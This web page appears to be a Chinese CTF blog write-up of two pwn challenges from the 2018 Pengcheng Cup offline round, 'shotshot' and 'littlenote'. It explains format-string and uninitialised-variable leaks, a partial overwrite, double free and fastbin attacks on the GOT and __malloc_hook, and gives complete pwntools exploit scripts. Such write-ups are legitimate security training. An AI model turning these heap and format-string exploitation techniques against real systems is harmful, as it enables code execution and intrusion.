<!DOCTYPE html>





<html class="theme-next muse use-motion" lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="generator" content="Hexo 3.7.1">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=7.3.0">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=7.3.0">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=7.3.0">
  <link rel="mask-icon" href="/images/logo.svg?v=7.3.0" color="#222">

<link rel="stylesheet" href="/css/main.css?v=7.3.0">


<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css?v=4.7.0">


<script id="hexo-configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '7.3.0',
    exturl: false,
    sidebar: {"position":"left","display":"post","offset":12,"onmobile":false},
    back2top: {"enable":true,"sidebar":false,"scrollpercent":false},
    save_scroll: false,
    copycode: {"enable":false,"show_result":false,"style":null},
    fancybox: false,
    mediumzoom: false,
    lazyload: false,
    pangu: false,
    algolia: {
      appID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    },
    localsearch: {"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},
    path: '',
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    translation: {
      copy_button: '复制',
      copy_success: '复制成功',
      copy_failure: '复制失败'
    }
  };
</script>

  <meta name="description" content="鹏城杯线下总结原文首发自安全客前言这次鹏城杯线下槽点很多，但是主要原因还是自己TCL。。这里我就选了比较简单的两题详细讲一下解题思路，如讲得不对，欢迎大佬指正。">
<meta property="og:type" content="article">
<meta property="og:title" content="鹏城杯线下总结">
<meta property="og:url" content="http://GD.com/2018/12/12/pcb/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="鹏城杯线下总结原文首发自安全客前言这次鹏城杯线下槽点很多，但是主要原因还是自己TCL。。这里我就选了比较简单的两题详细讲一下解题思路，如讲得不对，欢迎大佬指正。">
<meta property="og:locale" content="zh-CN">
<meta property="og:image" content="http://gd.com/2018/12/12/pcb/1.jpg">
<meta property="og:image" content="http://gd.com/2018/12/12/pcb/2.jpg">
<meta property="og:image" content="http://gd.com/2018/12/12/pcb/3.png">
<meta property="og:image" content="http://gd.com/2018/12/12/pcb/4.jpg">
<meta property="og:image" content="http://gd.com/2018/12/12/pcb/5.jpg">
<meta property="og:image" content="http://gd.com/2018/12/12/pcb/6.jpg">
<meta property="og:image" content="http://gd.com/2018/12/12/pcb/7.jpg">
<meta property="og:image" content="http://gd.com/2018/12/12/pcb/8.jpg">
<meta property="og:image" content="http://gd.com/2018/12/12/pcb/9.jpg">
<meta property="og:image" content="http://gd.com/2018/12/12/pcb/10.jpg">
<meta property="og:image" content="http://gd.com/2018/12/12/pcb/11.jpg">
<meta property="og:image" content="http://gd.com/2018/12/12/pcb/12.jpg">
<meta property="og:image" content="http://gd.com/2018/12/12/pcb/121.jpg">
<meta property="og:image" content="http://gd.com/2018/12/12/pcb/122.jpg">
<meta property="og:image" content="http://gd.com/2018/12/12/pcb/123.jpg">
<meta property="og:image" content="http://gd.com/2018/12/12/pcb/124.jpg">
<meta property="og:image" content="http://gd.com/2018/12/12/pcb/125.jpg">
<meta property="og:image" content="http://gd.com/2018/12/12/pcb/126.jpg">
<meta property="og:image" content="http://gd.com/2018/12/12/pcb/127.jpg">
<meta property="og:image" content="http://gd.com/2018/12/12/pcb/128.jpg">
<meta property="og:updated_time" content="2019-08-15T01:26:17.677Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="鹏城杯线下总结">
<meta name="twitter:description" content="鹏城杯线下总结原文首发自安全客前言这次鹏城杯线下槽点很多，但是主要原因还是自己TCL。。这里我就选了比较简单的两题详细讲一下解题思路，如讲得不对，欢迎大佬指正。">
<meta name="twitter:image" content="http://gd.com/2018/12/12/pcb/1.jpg">
  <link rel="canonical" href="http://GD.com/2018/12/12/pcb/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome: false,
    isPost: true,
    isPage: false,
    isArchive: false
  };
</script>

  <title>鹏城杯线下总结 | Hexo</title>
  








  <noscript>
  <style>
  .use-motion .motion-element,
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-title { opacity: initial; }

  .use-motion .logo,
  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-CN">

  <div class="container sidebar-position-left">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta">

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Hexo</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
  </div>

  <div class="site-nav-toggle">
    <button aria-label="切换导航栏">
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>


<nav class="site-nav">
  
  <ul id="menu" class="menu">
      
      
      
        
        <li class="menu-item menu-item-home">
      
    

    <a href="/" rel="section"><i class="menu-item-icon fa fa-fw fa-home"></i> <br>首页</a>

  </li>
      
      
      
        
        <li class="menu-item menu-item-archives">
      
    

    <a href="/archives/" rel="section"><i class="menu-item-icon fa fa-fw fa-archive"></i> <br>归档</a>

  </li>
  </ul>

    

</nav>
</div>
    </header>

    


    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content page-post-detail">
            

  <div id="posts" class="posts-expand">
    

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://GD.com/2018/12/12/pcb/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="GD">
      <meta itemprop="description" content="a GOOD pwner">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Hexo">
    </span>
      <header class="post-header">

        
          <h1 class="post-title" itemprop="name headline">鹏城杯线下总结

            
          </h1>
        

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              
                
              

              <time title="创建时间：2018-12-12 13:11:59" itemprop="dateCreated datePublished" datetime="2018-12-12T13:11:59+08:00">2018-12-12</time>
            </span>
          
            

            
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="fa fa-calendar-check-o"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2019-08-15 09:26:17" itemprop="dateModified" datetime="2019-08-15T09:26:17+08:00">2019-08-15</time>
              </span>
            
          

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="鹏城杯线下总结"><a href="#鹏城杯线下总结" class="headerlink" title="鹏城杯线下总结"></a>鹏城杯线下总结</h1><h2 id="原文首发自安全客"><a href="#原文首发自安全客" class="headerlink" title="原文首发自安全客"></a>原文首发自安全客</h2><h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>这次鹏城杯线下槽点很多，但是主要原因还是自己TCL。。这里我就选了比较简单的两题详细讲一下解题思路，如讲得不对，欢迎大佬指正。<a id="more"></a></p>
<h1 id="shotshot"><a href="#shotshot" class="headerlink" title="shotshot"></a>shotshot</h1><p>这题的泄露地址很容易，有个格式化字符串漏洞和变量未初始化，这两个都可以用来泄露地址，难点是后面有个任意地址写的漏洞怎么利用，自己先调试了好久，后来一航师傅写出脚本后我看了一眼才恍然大悟，师傅太强了，mark。</p>
<h2 id="1、查看保护"><a href="#1、查看保护" class="headerlink" title="1、查看保护"></a>1、查看保护</h2><p>主要开了canary和nx。</p>
<p><img src="/2018/12/12/pcb/1.jpg" alt="1"></p>
<h2 id="2、泄露地址"><a href="#2、泄露地址" class="headerlink" title="2、泄露地址"></a>2、泄露地址</h2><p>程序welcome函数中的变量v1没有初始化，show函数有个明显的格式化字符串漏洞，都可以用于泄露地址。</p>
<p><img src="/2018/12/12/pcb/2.jpg" alt="2"></p>
<p><img src="/2018/12/12/pcb/3.png" alt="3"></p>
<h3 id="（1）利用变量未初始化泄露"><a href="#（1）利用变量未初始化泄露" class="headerlink" title="（1）利用变量未初始化泄露"></a>（1）利用变量未初始化泄露</h3><p>在这里下个断点，输入几个‘a’，看看printf函数的栈里有什么。</p>
<p><img src="/2018/12/12/pcb/4.jpg" alt="4"></p>
<p>有这里可以看出，只要我们输入8个a，就能把后面的地址泄露出来，即&lt;_IO_stdfile_2_lock&gt;</p>
<p><img src="/2018/12/12/pcb/5.jpg" alt="5"></p>
<h3 id="（2）利用格式化字符串泄露地址"><a href="#（2）利用格式化字符串泄露地址" class="headerlink" title="（2）利用格式化字符串泄露地址"></a>（2）利用格式化字符串泄露地址</h3><p>这里我通过暴力泄露__libc_start_main的地址来获得基地址，偏移为11。</p>
<p><img src="/2018/12/12/pcb/6.jpg" alt="6"></p>
<p>代码为</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">p.recvuntil(&apos;Your name :&apos;)</span><br><span class="line">p.sendline(&apos;aaa&apos;)</span><br><span class="line">add(0x20,&apos;%11$lx&apos;)</span><br><span class="line">show()</span><br><span class="line">libc_start_main=int(p.recv(12),16)-0xf0</span><br><span class="line">	</span><br><span class="line">#gdb.attach(p)</span><br><span class="line">print hex(libc_start_main)</span><br><span class="line">li![7](E:\cmder\myblog\source\_posts\pcb\7.jpg)bcbase=libc_start_main-0x0020740</span><br><span class="line">print hex(libcbase)</span><br></pre></td></tr></table></figure>
<p><img src="/2018/12/12/pcb/7.jpg" alt="7"></p>
<h2 id="3、低字节任意改"><a href="#3、低字节任意改" class="headerlink" title="3、低字节任意改"></a>3、低字节任意改</h2><p>我们来看一下这里会执行start+32的地址，只要我们改掉这里的地址就能执行到我们想要的地方。</p>
<p><img src="/2018/12/12/pcb/8.jpg" alt="8"></p>
<p>在0x00040096C和0x00400C07下断点调试可以知道a1和start是同一个地址，即0x7ffff7ff5000，当v3等于0的时候就会有一次低字节任意写的机会，改写的位置就是我们输入的id，改写的内容就是我们输入的luckynum。</p>
<p><img src="/2018/12/12/pcb/9.jpg" alt="9"></p>
<p><img src="/2018/12/12/pcb/10.jpg" alt="10"></p>
<p>这时只要我们id输入为32，就能改写start+32的位置，输入luckynum为0xaf就能执行0x0400AAF ，即read。代码为</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">def shot(num,id):</span><br><span class="line">	p.recvuntil(&apos;5. exit\n&apos;)</span><br><span class="line">	p.sendline(&apos;4&apos;)</span><br><span class="line">	p.recvuntil(&apos;3. C++\n&apos;)</span><br><span class="line">	p.sendline(str(num))</span><br><span class="line">	p.recvuntil(&apos;Input the id:&apos;)</span><br><span class="line">	p.sendline(str(id))	</span><br><span class="line"></span><br><span class="line">def shoter():</span><br><span class="line">	p.recvuntil(&apos;5. exit\n&apos;)</span><br><span class="line">	p.sendline(&apos;4&apos;)</span><br><span class="line">	p.recvuntil(&apos;3. C++\n&apos;)</span><br><span class="line">	p.sendline(&apos;4&apos;)</span><br><span class="line">	</span><br><span class="line">shot(1,32)</span><br><span class="line">for i in range(3):</span><br><span class="line">	shoter()</span><br><span class="line">p.recvuntil(&apos;Give me your luckynum:\n&apos;)</span><br><span class="line"></span><br><span class="line">p.sendline(&apos;175&apos;)</span><br></pre></td></tr></table></figure>
<p>这时在0x00400A58下断点，就可以知道返回地址的偏移。由下图可以看出，偏移为0x10</p>
<p><img src="/2018/12/12/pcb/11.jpg" alt="11"></p>
<p>这时我们输入0x18个a就能崩溃</p>
<p><img src="/2018/12/12/pcb/12.jpg" alt="12"></p>
<h2 id="完整exp"><a href="#完整exp" class="headerlink" title="完整exp"></a>完整exp</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br></pre></td><td class="code"><pre><span class="line">from pwn import*</span><br><span class="line">context.log_level=True</span><br><span class="line">p=process(&apos;./shotshot&apos;)</span><br><span class="line"></span><br><span class="line">elf=ELF(&apos;shotshot&apos;)</span><br><span class="line">libc=ELF(&apos;libc.so.6&apos;)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">def add(leng,x):</span><br><span class="line">	p.recvuntil(&apos;5. exit\n&apos;)</span><br><span class="line">	p.sendline(&apos;1&apos;)</span><br><span class="line">	p.recvuntil(&quot;weapon&apos;s name:\n&quot;)</span><br><span class="line">	p.sendline(str(leng))</span><br><span class="line">	p.recvuntil(&apos;Input the name:\n&apos;)</span><br><span class="line">	p.sendline(x)</span><br><span class="line">	p.recvuntil(&apos;Success!\n&apos;)</span><br><span class="line">def delete():</span><br><span class="line">	p.recvuntil(&apos;5. exit\n&apos;)</span><br><span class="line">	p.sendline(&apos;3&apos;)</span><br><span class="line">	p.recvuntil(&quot;I can&apos;t believe it!&quot;)</span><br><span class="line">		</span><br><span class="line">def show():</span><br><span class="line">	p.recvuntil(&apos;5. exit\n&apos;)</span><br><span class="line">	p.sendline(&apos;2&apos;)</span><br><span class="line">def shot(num,id):</span><br><span class="line">	p.recvuntil(&apos;5. exit\n&apos;)</span><br><span class="line">	p.sendline(&apos;4&apos;)</span><br><span class="line">	p.recvuntil(&apos;3. C++\n&apos;)</span><br><span class="line">	p.sendline(str(num))</span><br><span class="line">	p.recvuntil(&apos;Input the id:&apos;)</span><br><span class="line">	p.sendline(str(id))	</span><br><span class="line"></span><br><span class="line">def shoter():</span><br><span class="line">	p.recvuntil(&apos;5. exit\n&apos;)</span><br><span class="line">	p.sendline(&apos;4&apos;)</span><br><span class="line">	p.recvuntil(&apos;3. C++\n&apos;)</span><br><span class="line">	p.sendline(&apos;4&apos;)</span><br><span class="line">	</span><br><span class="line"></span><br><span class="line">p.recvuntil(&apos;Your name :&apos;)</span><br><span class="line">p.sendline(&apos;aaa&apos;)</span><br><span class="line">add(0x20,&apos;%11$lx&apos;)</span><br><span class="line">show()</span><br><span class="line">libc_start_main=int(p.recv(12),16)-0xf0</span><br><span class="line">	</span><br><span class="line">#gdb.attach(p)</span><br><span class="line">print hex(libc_start_main)</span><br><span class="line">libcbase=libc_start_main-0x0020740</span><br><span class="line">print hex(libcbase)</span><br><span class="line">one=libcbase+0xf02a4</span><br><span class="line">shot(1,32)</span><br><span class="line">for i in range(3):</span><br><span class="line">	shoter()</span><br><span class="line">p.recvuntil(&apos;Give me your luckynum:\n&apos;)</span><br><span class="line"></span><br><span class="line">p.sendline(&apos;175&apos;)</span><br><span class="line">sleep(0.5)</span><br><span class="line">p.sendline(&apos;a&apos;*16+p64(one))</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
<h1 id="littlenote"><a href="#littlenote" class="headerlink" title="littlenote"></a>littlenote</h1><p>这道题目不知怎么回事，比赛刚开始没多久就有人做出来了？其实这题关键的点就是要泄露地址，然后就是简单的改malloc hook了，我赛后跟别人交流了一下，没想到这道题有三种泄露的方法。其中一种是我万万没想到的。。</p>
<h2 id="1、查看保护-1"><a href="#1、查看保护-1" class="headerlink" title="1、查看保护"></a>1、查看保护</h2><p>这里主要开启了canary和NX保护</p>
<p><img src="/2018/12/12/pcb/121.jpg" alt="121"></p>
<h2 id="2、ida打开分析"><a href="#2、ida打开分析" class="headerlink" title="2、ida打开分析"></a>2、ida打开分析</h2><p>这里的addnote限制了大小，只有0x60和0x20，而且，这里还有一个UAF</p>
<p><img src="/2018/12/12/pcb/122.jpg" alt="122"></p>
<p>freenote里还有一个UAF，以及double free漏洞</p>
<p><img src="/2018/12/12/pcb/123.jpg" alt="123"></p>
<p>hacker函数里有个负数组越界，不过貌似没什么用额。。</p>
<p><img src="/2018/12/12/pcb/124.jpg" alt="124"></p>
<h2 id="3、泄露地址"><a href="#3、泄露地址" class="headerlink" title="3、泄露地址"></a>3、泄露地址</h2><h3 id="（1）、利用scanf函数泄露地址"><a href="#（1）、利用scanf函数泄露地址" class="headerlink" title="（1）、利用scanf函数泄露地址"></a>（1）、利用scanf函数泄露地址</h3><p>当时听到还能这样泄露真的崩溃了，竟然还能这么简单。。只要在这里输入一个‘a’，就会输出v4的地址。</p>
<p><img src="/2018/12/12/pcb/125.jpg" alt="125"></p>
<p><img src="/2018/12/12/pcb/126.jpg" alt="126"></p>
<h3 id="（2）、利用double-free覆盖got表泄露地址"><a href="#（2）、利用double-free覆盖got表泄露地址" class="headerlink" title="（2）、利用double free覆盖got表泄露地址"></a>（2）、利用double free覆盖got表泄露地址</h3><p>这里利用fastbin attack到got表的位置，然后就会输出上面的地址，不过这种方法利用的条件要很挑剔，在上面只找到了一个合适的位置attack。然后执行show就会输出_IO_2_1_stderr_的地址</p>
<p><img src="/2018/12/12/pcb/127.jpg" alt="127"></p>
<p>代码如下</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">add(&apos;a&apos;,&apos;Y&apos;)</span><br><span class="line">add(&apos;a&apos;,&apos;Y&apos;)</span><br><span class="line">delete(0)</span><br><span class="line">delete(1)</span><br><span class="line">delete(0)</span><br><span class="line"></span><br><span class="line">add(p64(elf.got[&apos;stdout&apos;]-3),&apos;Y&apos;)</span><br><span class="line">print hex(elf.got[&apos;stdout&apos;])</span><br><span class="line">add(&apos;a&apos;,&apos;Y&apos;)</span><br><span class="line">add(&apos;a&apos;,&apos;Y&apos;)</span><br><span class="line"></span><br><span class="line">add(&apos;a&apos;*18,&apos;Y&apos;)</span><br><span class="line">show(5)</span><br></pre></td></tr></table></figure>
<h3 id="（3）、利用double-free修改chunk的size泄露"><a href="#（3）、利用double-free修改chunk的size泄露" class="headerlink" title="（3）、利用double free修改chunk的size泄露"></a>（3）、利用double free修改chunk的size泄露</h3><p>因为这里UAF只能泄露堆的地址，所以这里我们可以利用double free修改fd为堆块的地址然后覆盖chunk改下一个chunk的size。free后会放入unsorted bin，最后利用show输出泄露main_arena的地址。师傅的代码如下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">add(&quot;1&quot;*8)</span><br><span class="line">		add(&quot;2&quot;*0x10 + p64(0)+p64(0x71))</span><br><span class="line">		add(&quot;3&quot;*0x10 + p64(0)+p64(0x21))</span><br><span class="line">		add((p64(0) + p64(0x21))*4)</span><br><span class="line">		free(1)</span><br><span class="line">		free(0)</span><br><span class="line">		free(1)</span><br><span class="line">		heap = show(0)</span><br><span class="line">		print hex(heap)</span><br><span class="line">		add(p64(heap+0x20)[0:2])</span><br><span class="line">		add(&quot;2&quot;*8)</span><br><span class="line">		add(&quot;3&quot;*8)</span><br><span class="line">		add(&quot;4&quot;*0x40 + p64(0) + p64(0x91))</span><br><span class="line">		free(2)</span><br><span class="line">		add(&quot;\x88&quot;)</span><br><span class="line">		addr = show(8)</span><br></pre></td></tr></table></figure>
<h2 id="4、改malloc-hook为one-gadget"><a href="#4、改malloc-hook为one-gadget" class="headerlink" title="4、改malloc hook为one_gadget"></a>4、改malloc hook为one_gadget</h2><p>既然地址知道了，我们就可以利用double free改fd指针为malloc hook附近的地方，使之成为合法的chunk</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">delete(2)</span><br><span class="line">delete(3)</span><br><span class="line">delete(2)</span><br><span class="line">one=libcbase+0xf02a4</span><br><span class="line">add(p64(malloc-0x13),&apos;Y&apos;)</span><br><span class="line">add(&apos;a&apos;,&apos;Y&apos;)</span><br><span class="line">add(&apos;a&apos;,&apos;Y&apos;)</span><br><span class="line">#gdb.attach(p)</span><br><span class="line">add(&apos;a&apos;*3+p64(one),&apos;Y&apos;)</span><br><span class="line">delete(7)</span><br><span class="line">delete(7)</span><br></pre></td></tr></table></figure>
<p><img src="/2018/12/12/pcb/128.jpg" alt="128"></p>
<h2 id="完整exp-1"><a href="#完整exp-1" class="headerlink" title="完整exp"></a>完整exp</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br></pre></td><td class="code"><pre><span class="line">from pwn import*</span><br><span class="line">context.log_level=True</span><br><span class="line">p=process(&apos;./littlenote&apos;)</span><br><span class="line">#p=remote(&apos;172.91.0.64&apos;,8088)</span><br><span class="line">elf=ELF(&apos;littlenote&apos;)</span><br><span class="line">libc=ELF(&apos;/lib/x86_64-linux-gnu/libc.so.6&apos;)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">def add(x,f):</span><br><span class="line">	p.recvuntil(&apos;Your choice:\n&apos;)</span><br><span class="line">	p.sendline(&apos;1&apos;)</span><br><span class="line">	p.recvuntil(&quot;Enter your note\n&quot;)</span><br><span class="line">	p.sendline(x)</span><br><span class="line">	p.recvuntil(&apos;Want to keep your note?\n&apos;)</span><br><span class="line">	p.sendline(str(f))</span><br><span class="line">	p.recvuntil(&apos;Done\n&apos;)</span><br><span class="line">def delete(id):</span><br><span class="line">	p.recvuntil(&apos;Your choice:\n&apos;)</span><br><span class="line">	p.sendline(&apos;3&apos;)</span><br><span class="line">	p.recvuntil(&quot;Which note do you want to delete?&quot;)</span><br><span class="line">	p.sendline(str(id))	</span><br><span class="line">def show(id):</span><br><span class="line">	p.recvuntil(&apos;Your choice:\n&apos;)</span><br><span class="line">	p.sendline(&apos;2&apos;)</span><br><span class="line">	p.recvuntil(&apos;Which note do you want to show?\n&apos;)</span><br><span class="line">	p.sendline(str(id))</span><br><span class="line">def hack():</span><br><span class="line"></span><br><span class="line">	p.recvuntil(&apos;Your choice:\n&apos;)</span><br><span class="line">	p.sendline(&apos;5&apos;)</span><br><span class="line">	p.recvuntil(&quot;Enter administrator&apos;s name:\n&quot;)</span><br><span class="line">	p.sendline(&apos;a&apos;)</span><br><span class="line">def hacker(x):</span><br><span class="line">	for i in range(-15,-9):</span><br><span class="line">		p.recvuntil(&apos;Enter hacker index:\n&apos;)</span><br><span class="line">		p.sendline(str(i))</span><br><span class="line">		p.recvuntil(&apos;Enter hacker age:\n&apos;)</span><br><span class="line">		p.sendline(x)</span><br><span class="line">add(&apos;a&apos;,&apos;Y&apos;)</span><br><span class="line">add(&apos;a&apos;,&apos;Y&apos;)</span><br><span class="line">delete(0)</span><br><span class="line">delete(1)</span><br><span class="line">delete(0)</span><br><span class="line"></span><br><span class="line">add(p64(elf.got[&apos;stdout&apos;]-3),&apos;Y&apos;)</span><br><span class="line">print hex(elf.got[&apos;stdout&apos;])</span><br><span class="line">add(&apos;a&apos;,&apos;Y&apos;)</span><br><span class="line">add(&apos;a&apos;,&apos;Y&apos;)</span><br><span class="line"></span><br><span class="line">add(&apos;a&apos;*18,&apos;Y&apos;)</span><br><span class="line">show(5)</span><br><span class="line">#gdb.attach(p)</span><br><span class="line">#p.recv()</span><br><span class="line">p.recvuntil(&apos;aaaaaaaaaaaaaaaaaa\n&apos;)</span><br><span class="line">raw_input()</span><br><span class="line">a=u64(p.recv(6).ljust(0x8,&apos;\x00&apos;))</span><br><span class="line">libcbase=a-libc.symbols[&apos;_IO_2_1_stderr_&apos;]</span><br><span class="line">print hex(a)</span><br><span class="line">print hex(libcbase)</span><br><span class="line">malloc=libcbase+libc.symbols[&apos;__malloc_hook&apos;]</span><br><span class="line">delete(2)</span><br><span class="line">delete(3)</span><br><span class="line">delete(2)</span><br><span class="line">one=libcbase+0xf02a4</span><br><span class="line">add(p64(malloc-0x13),&apos;Y&apos;)</span><br><span class="line">add(&apos;a&apos;,&apos;Y&apos;)</span><br><span class="line">add(&apos;a&apos;,&apos;Y&apos;)</span><br><span class="line">#gdb.attach(p)</span><br><span class="line">add(&apos;a&apos;*3+p64(one),&apos;Y&apos;)</span><br><span class="line">gdb.attach(p)</span><br><span class="line">delete(7)</span><br><span class="line">delete(7)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">p.recv()</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
<h1 id="小结"><a href="#小结" class="headerlink" title="小结"></a>小结</h1><p>自己TCL，师傅们太强了，被虐哭了。。今后还需要努力。</p>

    </div>

    
    
    
        
      

      <footer class="post-footer">

        

          <div class="post-nav">
            <div class="post-nav-next post-nav-item">
              
                <a href="/2018/11/20/rop/" rel="next" title="浅析栈溢出遇到的两种坑及绕过技巧">
                  <i class="fa fa-chevron-left"></i> 浅析栈溢出遇到的两种坑及绕过技巧
                </a>
              
            </div>

            <span class="post-nav-divider"></span>

